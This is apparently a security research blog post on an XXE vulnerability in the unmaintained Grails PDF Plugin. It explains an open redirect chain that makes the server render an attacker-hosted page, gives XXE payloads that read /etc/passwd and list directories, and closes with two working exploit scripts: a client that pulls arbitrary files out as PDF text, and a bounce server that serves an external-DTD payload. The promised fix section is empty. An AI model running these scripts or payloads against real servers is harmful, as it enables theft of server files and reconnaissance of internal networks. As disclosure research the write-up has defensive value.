Discovery
Some time ago, the Ambionics team encountered a very old instance of Grails, a Groovy-based MVC framework. This instance contained a plugin to generate PDFs from Groovy templates, quite simply named PDF Plugin. Looking for the plugin's source code, we found that it had not been maintained for the past 6 years, with the last commit dating from August 3, 2011. Naturally, this caught our eye.
The plugin
Extract from the plugin's README:
Pdf plugin allows a Grails application to generate PDFs and send them
to the browser by converting existing pages in your application to PDF
on the fly. The underlying system uses the xhtmlrenderer component from java.net
along with iText to do the rendering.
Two important things can be noted:
- It converts existing pages of the application.
- It uses Flying Saucer to do the HTML to PDF conversion.
Upon further inspection, it also appeared that Flying Saucer, the Java library which converts HTML to PDF, has the following properties:
- It is able to fetch resource files, such as images, Cascading Style Sheets (CSS), etc.
- It is very specific about not accepting invalid HTML.
- It parses the HTML using the Java XML parser.
As always, when we see an XML parser, we think about XXE. What if we could read files on the server?
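To make the idea concrete, here is a minimal Python sketch of entity expansion, the mechanism XXE abuses. It uses a harmless internal entity and Python's xml.etree.ElementTree rather than the Java parser used by Flying Saucer, so it only illustrates the principle. The entity name greeting is made up for the example.

```python
import xml.etree.ElementTree as ET

# A document whose DTD declares an internal entity. An XXE payload has the
# same shape, except that the entity is declared with SYSTEM and a URI, so a
# parser that resolves external entities substitutes the content of that URI.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE html [
<!ENTITY greeting "hello from the DTD">
]>
<html><body><pre>&greeting;</pre></body></html>"""

root = ET.fromstring(DOCUMENT)
# The parser has already replaced &greeting; with the entity's value.
expanded = root.find("./body/pre").text
print(expanded)
```

If the renderer's parser does the same for external entities, whatever the entity points to ends up in the rendered document.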
The code
Here is the code of the main controller of the plugin, with comments of my own:
// The eponymous method is called upon reaching the /pdf/pdfForm URL, and the
// params array is user-submitted GET/POST data
def pdfForm = {
    try{
        byte[] b
        // Build a base URI, something like
        // http://localhost:80/base_path/
        def baseUri = request.scheme + "://" + request.serverName + ":" + request.serverPort + grailsAttributes.getApplicationUri(request)
        // 1: If it is a GET call, append the url parameter to the base URI, fetch it via an HTTP request, and render it
        // For instance, if we fetch http://target.com/pdf/pdfForm?url=/test.html, it will try to render http://localhost/test.html
        if(request.method == "GET") {
            def url = baseUri + params.url + '?' + request.getQueryString()
            //println "BaseUri is $baseUri"
            //println "Fetching url $url"
            b = pdfService.buildPdf(url)
        }
        // 2: If it's a POST call, generate the HTML content from a controller and an action, and feed it to the generator
        if(request.method == "POST"){
            def content
            if(params.template){
                //println "Template: $params.template"
                content = g.render(template:params.template, model:[pdf:params])
            }
            else{
                content = g.include(controller:params.pdfController, action:params.pdfAction, id:params.id, pdf:params)
            }
            b = pdfService.buildPdfFromString(content.readAsString(), baseUri)
        }
        response.setContentType("application/pdf")
        response.setHeader("Content-disposition", "attachment; filename=" + (params.filename ?: "document.pdf"))
        response.setContentLength(b.length)
        response.getOutputStream().write(b)
    }
    // In case of error, redirect to the url specified by the url parameter
    catch (e) {
        println "there was a problem with PDF generation ${e}"
        if(params.template) render(template:params.template)
        if(params.url) redirect(uri:params.url + '?' + request.getQueryString())
        else redirect(controller:params.pdfController, action:params.pdfAction, params:params)
    }
}
From the code, it appears that the PDF plugin has two ways of generating a PDF:
- From a local URL, it sends a GET request to the page, and renders it via pdfService.buildPdf
- From a given Groovy controller and action, it generates the HTML content, and feeds it to the PDF generator through pdfService.buildPdfFromString
As we do not control any Groovy template or controller on the server, we're not interested in the second option. The first one looks more promising: it issues an HTTP request to a local URI.
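The URL built by the GET branch can be sketched in Python as follows. This is only a transcription of the Groovy string concatenation, not the plugin's code; the function name build_fetch_url and the base URI value are assumptions made for the example.

```python
def build_fetch_url(base_uri: str, url_param: str, query_string: str) -> str:
    """Python transcription of the Groovy expression
    baseUri + params.url + '?' + request.getQueryString()."""
    return base_uri + url_param + "?" + query_string


# Assumed base URI; the real value depends on the deployment.
BASE_URI = "http://localhost:80/"

# A relative path gives a local URL, as the plugin intends.
local = build_fetch_url(BASE_URI, "test.html", "url=test.html")

# An absolute URL is not fetched directly: it is glued after the base URI.
absolute = build_fetch_url(
    BASE_URI,
    "http://attacker.com/page.html",
    "url=http://attacker.com/page.html",
)

print(local)
print(absolute)
```

Two details stand out: the url parameter is never validated, and the whole query string is appended again to the URL being fetched.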
Step 1: Fetching our HTML page
Although it might sometimes be useful (for instance to bypass an IP filter or to reach an HTTP service in the internal network), making the module fetch a local URI for us and return it as a PDF is not of great help. What we want is complete control of the HTML page that is fed to the PDF renderer.
Luckily, the solution is in the same piece of code: if any exception happens during the PDF generation, the catch block handles the error by redirecting us to the URL of our choice (params.url). Therefore, we have an open redirect: http://target.com/pdf/pdfForm?url=http://attacker.com/page.html will redirect us to http://attacker.com/page.html, because the code will try to send an HTTP request to http://target.com/http://attacker.com/page.html, which will fail, throwing an exception.
By issuing a GET request to http://target.com/pdf/pdfForm?url=pdf/pdfForm?url=http://attacker.com/page.html (note the duplication of the pdf/pdfForm?url= part), the following happens:
- The pdfForm method appends our URL parameter to the baseUri, and fetches it internally
- The server issues a GET request to http://localhost/pdf/pdfForm?url=http://attacker.com/page.html
- The server appends http://attacker.com/page.html to the baseUri
- The server issues a request to http://localhost/http://attacker.com/page.html
- The request fails (404)
- Since the request failed, an exception is thrown, resulting in a redirect to http://attacker.com/page.html
- Our first request results in http://attacker.com/page.html being rendered in PDF
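The steps above can be modelled with a small Python simulation. It is a toy model, not the plugin: fetch stands in for the renderer's HTTP client (assumed to follow redirects, as the steps imply), pdf_form mirrors the GET branch and the catch block, and the base URI and the FetchError class are assumptions made for the example.

```python
BASE_URI = "http://localhost:80/"                # assumed value of baseUri
ATTACKER_PAGE = "http://attacker.com/page.html"  # page we host
PDF_FORM = BASE_URI + "pdf/pdfForm?"


class FetchError(Exception):
    """Stands in for any exception raised while fetching or rendering."""


def fetch(url, trace):
    """Toy HTTP client that records each URL and follows redirects."""
    trace.append(url)
    if url.startswith(ATTACKER_PAGE):
        return "<html>attacker-controlled</html>"
    if url.startswith(PDF_FORM):
        kind, value = pdf_form(url[len(PDF_FORM):], trace)
        return fetch(value, trace) if kind == "redirect" else value
    raise FetchError("404: " + url)


def pdf_form(query_string, trace):
    """Model of the GET branch of pdfForm and of its catch block."""
    # The payload contains no '&', so everything after 'url=' is params.url.
    url_param = query_string[len("url="):]
    try:
        html = fetch(BASE_URI + url_param + "?" + query_string, trace)
        return ("pdf", "PDF[" + html + "]")
    except FetchError:
        # catch block: redirect(uri: params.url + '?' + queryString)
        return ("redirect", url_param + "?" + query_string)


trace = []
result = pdf_form("url=pdf/pdfForm?url=" + ATTACKER_PAGE, trace)
for step, url in enumerate(trace, 1):
    print(step, url)
print(result)
```

The trace shows three fetches: the inner pdfForm call, the failing local URL, and finally our page, reached through the redirect. Because the query string is appended at every hop, the URL requested from our server carries several copies of the url parameter.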
Let us try it by rendering a Hello world:
GET /page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html?url=http://10.0.0.138/page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html
We're now able to make the server render a page of our choice! Our first idea from this point was to use the file:// scheme instead of the standard http://; it did not work. It does not matter though, because controlling the rendered page widens our attack surface by a lot.
Step 2: Playing with the renderer
Now that we control our page, let's go ahead and verify Flying Saucer's promises.
For instance, let's ask it to render an image, with an <img src="image.jpg" /> tag:
Or some CSS:
Step 3: Exploitation
It's now time to try a simple XXE:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY goodies SYSTEM "file:///etc/passwd">
]>
<html>
<body>
<!-- Since it's HTML after all, why not render our output nicely -->
<pre>&goodies;</pre>
</body>
</html>
Which yields:
Listing directories is also possible, via the same vector:
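As a minimal sketch, the payload can be parameterised so that the same page targets either a file or a directory. The helper name build_xxe_page and the file:///etc/ example path are assumptions made for the illustration; only the page layout comes from the payload shown earlier.

```python
def build_xxe_page(resource: str) -> str:
    """Return an XHTML page whose DTD declares `resource` as an external entity."""
    # The SYSTEM literal is delimited by double quotes and is not subject to
    # escaping, so a resource containing a double quote cannot be expressed.
    if '"' in resource:
        raise ValueError("resource must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE html [\n"
        f'<!ENTITY goodies SYSTEM "{resource}">\n'
        "]>\n"
        "<html>\n<body>\n<pre>&goodies;</pre>\n</body>\n</html>\n"
    )


file_page = build_xxe_page("file:///etc/passwd")
dir_page = build_xxe_page("file:///etc/")  # hypothetical directory target
print(dir_page)
```

Only the SYSTEM identifier changes between the two pages; the rest of the document is identical.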
Using the CSS parsing capability of Flying Saucer and pdftotext, we are able to completely automate the process.
The exploitation allowed us to fetch critical data from the server, and helped us map the internal network.
Correction
Even if the plugin is not that recent, here are recommendations on how to fix it, without diving too deep into the code:
Exploit
dump_file.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
import requests
import subprocess
import sys
# Base URL of the Grails target
URL = 'http://10.0.0.179:8080/grailstest'
# "Bounce" HTTP Server
BOUNCE = 'http://10.0.0.138:7777/'
pdfForm = '/pdf/pdfForm?url='
renderPage = 'render.html'
# The resource to fetch is required as the first argument
if len(sys.argv) < 2:
    print('usage: %s <resource>' % sys.argv[0])
    print('e.g.: %s file:///etc/passwd' % sys.argv[0])
    sys.exit(1)
resource = sys.argv[1]
# Build the full URL
full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
full_url += '&resource=' + resource
r = requests.get(full_url, allow_redirects=False)
#print(full_url)
if r.status_code != 200:
    print('Error: %s' % r)
else:
    with open('/tmp/file.pdf', 'wb') as handle:
        handle.write(r.content)
    # pdftotext writes the text next to the PDF, as /tmp/file.txt
    subprocess.run(['pdftotext', '/tmp/file.pdf'], check=True)
    with open('/tmp/file.txt', 'r') as handle:
        print(handle.read(), end='')
server.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
#
# Server part of the exploitation
#
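# Start it from an empty folder, since it writes render.html and out.dtd
# into the current directory and serves files from there:
# $ mkdir /tmp/empty
# $ mv server.py /tmp/empty
# $ cd /tmp/empty
# $ ./server.py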
import http.server
import socketserver
import sys
BOUNCE_IP = '10.0.0.138'
BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
# Template for the HTML page
template = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "[RESOURCE]">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
%dtd;
]>
<html>
<head>
<style>
body { font-size: 1px; width: 1000000000px;}
</style>
</head>
<body>
<pre>&all;</pre>
</body>
</html>"""
# The external DTD trick allows us to get more files; they would've been invalid
# otherwise
# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
dtd = """<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
"""
# Really hacky. When the render.html page is requested, we extract the
# 'resource=XXX' part of the URL and create an HTML file which XXEs it.
class GetHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if 'render.html' in self.path:
            resource = self.path.split('resource=')[1]
            print('Resource: %s' % resource)
            page = template
            page = page.replace('[RESOURCE]', resource)
            page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, BOUNCE_PORT))
            with open('render.html', 'w') as handle:
                handle.write(page)
        # Serve the requested file (render.html or out.dtd) from the current folder
        return super().do_GET()
Handler = GetHandler
httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)
with open('out.dtd', 'w') as handle:
    handle.write(dtd)
print("Started HTTP server on port %d, press Ctrl-C to exit..." % BOUNCE_PORT)
try:
    httpd.serve_forever()
except KeyboardInterrupt:
    print("Keyboard interrupt received, exiting.")
    httpd.server_close()